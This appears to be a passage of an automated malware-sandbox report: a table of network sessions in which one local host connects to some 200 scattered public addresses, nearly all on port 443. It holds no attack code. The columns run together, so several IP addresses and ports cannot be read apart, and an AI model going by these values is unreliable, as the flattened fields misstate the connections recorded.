                                                        21037192.168.2.1448774133.183.234.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21038192.168.2.1447746174.102.245.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21039192.168.2.1434222208.36.227.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21040192.168.2.1447396140.212.196.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21041192.168.2.1457742209.205.95.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21042192.168.2.1456556223.166.71.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21043192.168.2.1452976203.215.13.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21044192.168.2.1441478190.63.199.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21045192.168.2.14606848.62.219.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21046192.168.2.1437954151.188.210.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21047192.168.2.144709296.151.22.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21048192.168.2.1444968178.165.94.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21049192.168.2.1442224164.29.158.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21050192.168.2.1437452198.109.79.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21051192.168.2.1434324145.175.214.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21052192.168.2.1459678179.76.54.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21053192.168.2.1438398117.176.198.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21054192.168.2.1448518150.10.179.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21055192.168.2.145605245.171.94.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21056192.168.2.145039034.254.12.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21057192.168.2.1451510165.145.242.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21058192.168.2.1460694109.243.179.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21059192.168.2.1455120138.123.178.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21060192.168.2.1433796179.67.230.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21061192.168.2.145293824.9.90.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21062192.168.2.144459672.170.176.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21063192.168.2.145860494.182.189.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21064192.168.2.144870097.48.241.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21065192.168.2.1441948198.46.248.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21066192.168.2.144888257.69.80.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21067192.168.2.1448416139.184.70.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21068192.168.2.1447260182.139.34.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21069192.168.2.145502636.88.187.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21070192.168.2.144565282.194.136.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21071192.168.2.145551682.71.99.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21072192.168.2.143539454.240.28.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21073192.168.2.1450616181.117.103.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21074192.168.2.1437826191.8.74.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21075192.168.2.143744279.242.177.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21076192.168.2.145260847.229.25.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21077192.168.2.143961271.62.159.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21078192.168.2.143347658.216.141.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21079192.168.2.1445284112.155.179.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21080192.168.2.1450010131.78.30.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21081192.168.2.1447228128.59.175.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21082192.168.2.1432950129.124.126.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21083192.168.2.1452280194.234.122.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21084192.168.2.1433082114.10.88.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21085192.168.2.14574282.51.156.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21086192.168.2.1434080198.2.84.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21087192.168.2.144304884.175.197.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21088192.168.2.1447124116.17.51.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21089192.168.2.1457058154.171.204.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21090192.168.2.144255094.20.101.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21091192.168.2.1454466126.105.164.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21092192.168.2.1438050198.238.237.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21093192.168.2.1434540210.84.19.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21094192.168.2.1446164119.225.57.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21095192.168.2.1440128172.53.235.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21096192.168.2.1457134184.62.43.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21097192.168.2.1455316139.166.180.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21098192.168.2.144950251.253.210.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21099192.168.2.1438472174.15.207.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21100192.168.2.1459492149.136.230.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21101192.168.2.14374749.252.216.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21102192.168.2.1451532223.122.125.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21103192.168.2.1457618195.193.187.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21104192.168.2.144177632.216.210.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21105192.168.2.1448724163.44.160.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21106192.168.2.1437634106.75.248.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21107192.168.2.145557093.119.70.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21108192.168.2.145639275.65.205.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21109192.168.2.144180253.19.80.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21110192.168.2.1459458209.161.32.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21111192.168.2.1444980157.221.113.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21112192.168.2.1444360103.197.26.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21113192.168.2.1459750181.97.210.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21114192.168.2.145825227.179.251.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21115192.168.2.1440732108.193.230.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21116192.168.2.145826813.224.34.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21117192.168.2.1442016161.224.194.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21118192.168.2.1436736106.206.173.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21119192.168.2.1458870205.247.169.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21120192.168.2.144486620.187.105.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21121192.168.2.144084827.96.174.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21122192.168.2.144499453.231.70.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21123192.168.2.144206227.136.30.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21124192.168.2.1449618122.63.241.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21125192.168.2.1450888202.254.252.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21126192.168.2.1441426201.47.184.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21127192.168.2.144008232.58.118.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21128192.168.2.1437542198.176.222.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21129192.168.2.1448978162.30.234.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21130192.168.2.1441812122.136.32.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21131192.168.2.1444556113.108.150.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21132192.168.2.1436890120.82.217.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21133192.168.2.144884454.114.217.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21134192.168.2.144985850.202.254.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21135192.168.2.1451542221.243.144.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21136192.168.2.1444880164.235.32.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21137192.168.2.1443974216.116.243.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21138192.168.2.1455508141.110.220.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21139192.168.2.1440630199.43.148.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21140192.168.2.1453420113.152.241.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21141192.168.2.1436654145.49.93.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21142192.168.2.1434372211.33.142.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21143192.168.2.1457150143.42.35.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21144192.168.2.1448224185.252.156.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21145192.168.2.1454474189.248.154.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21146192.168.2.145846058.161.19.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21147192.168.2.1440562142.173.183.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21148192.168.2.1453258216.124.171.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21149192.168.2.14390248.41.239.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21150192.168.2.1453524199.135.221.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21151192.168.2.1433076134.208.198.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21152192.168.2.1453536174.197.160.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21153192.168.2.1458840103.34.124.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21154192.168.2.1453446203.23.63.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21155192.168.2.144224043.4.81.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21156192.168.2.145853623.241.120.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21157192.168.2.1443916167.47.28.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21158192.168.2.145845691.235.206.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21159192.168.2.1457678200.2.150.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21160192.168.2.144421276.138.145.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21161192.168.2.144769045.3.140.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21162192.168.2.1450466167.195.162.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21163192.168.2.1439130166.186.219.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21164192.168.2.145857269.166.230.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21165192.168.2.146071620.49.119.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21166192.168.2.1459410182.64.129.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21167192.168.2.1456276165.180.73.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21168192.168.2.1448340168.193.83.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21169192.168.2.143615234.123.221.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21170192.168.2.144480047.144.232.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21171192.168.2.143851653.206.140.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21172192.168.2.1460054114.70.238.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21173192.168.2.1434294113.248.139.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21174192.168.2.1441084135.235.196.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21175192.168.2.143758275.241.90.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21176192.168.2.1444138142.143.180.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21177192.168.2.1452174102.161.254.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21178192.168.2.1459056139.236.33.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21179192.168.2.145092067.20.20.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21180192.168.2.143926864.254.145.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21181192.168.2.1453606158.88.239.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21182192.168.2.143935886.10.242.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21183192.168.2.145369432.121.187.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21184192.168.2.144983459.210.30.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21185192.168.2.1437012144.121.83.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21186192.168.2.1457464120.41.187.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21187192.168.2.1456164121.24.5.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21188192.168.2.1445968200.117.7.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21189192.168.2.1434262196.193.145.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21190192.168.2.144009014.193.170.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21191192.168.2.143606040.98.34.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192192.168.2.1441198213.126.1.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21193192.168.2.1457760163.187.233.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21194192.168.2.1434072112.222.58.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21195192.168.2.1441366160.91.115.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21196192.168.2.1446104101.98.125.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21197192.168.2.143554269.48.15.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21198192.168.2.1439828199.246.239.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21199192.168.2.1434790159.232.151.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21200192.168.2.1448294160.99.87.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21201192.168.2.1442208209.27.10.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21202192.168.2.145315027.40.107.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21203192.168.2.1439264152.82.216.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21204192.168.2.145393020.2.193.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21205192.168.2.1459666177.29.159.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21206192.168.2.1451960105.122.109.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21207192.168.2.1439670150.193.6.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21208192.168.2.145883865.219.10.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21209192.168.2.145456474.8.52.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21210192.168.2.144259287.23.209.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21211192.168.2.1441798204.201.4.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21212192.168.2.144538018.15.190.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21213192.168.2.1444922211.155.101.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21214192.168.2.1459028222.103.219.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21215192.168.2.1437008126.89.35.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21216192.168.2.1447542135.233.115.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21217192.168.2.1438036133.245.172.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21218192.168.2.143346492.37.238.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21219192.168.2.1458562101.244.234.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21220192.168.2.1447912174.252.154.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21221192.168.2.1452568139.224.231.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21222192.168.2.1451916170.222.110.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21223192.168.2.144607272.135.254.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21224192.168.2.1451396126.79.20.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21225192.168.2.146003214.204.8.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21226192.168.2.1436096130.204.28.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21227192.168.2.14359925.172.14.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21228192.168.2.144253896.248.104.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21229192.168.2.145155441.120.187.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21230192.168.2.144538899.201.66.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21231192.168.2.1449650120.205.3.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21232192.168.2.1459360158.17.100.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21233192.168.2.1451974128.106.2.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21234192.168.2.1446358206.84.240.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21235192.168.2.1456368178.95.211.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21236192.168.2.143896638.185.166.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21237192.168.2.144920644.230.245.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21238192.168.2.1434872221.16.53.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21239192.168.2.146081852.37.156.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21240192.168.2.1433602134.173.98.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21241192.168.2.143813650.32.243.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21242192.168.2.145390897.157.209.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21243192.168.2.144653457.36.66.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21244192.168.2.1451216185.119.72.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21245192.168.2.14473869.23.226.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21246192.168.2.1445312187.155.100.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21247192.168.2.1443190207.169.168.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21248192.168.2.1452244190.113.74.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21249192.168.2.143584495.46.210.33443
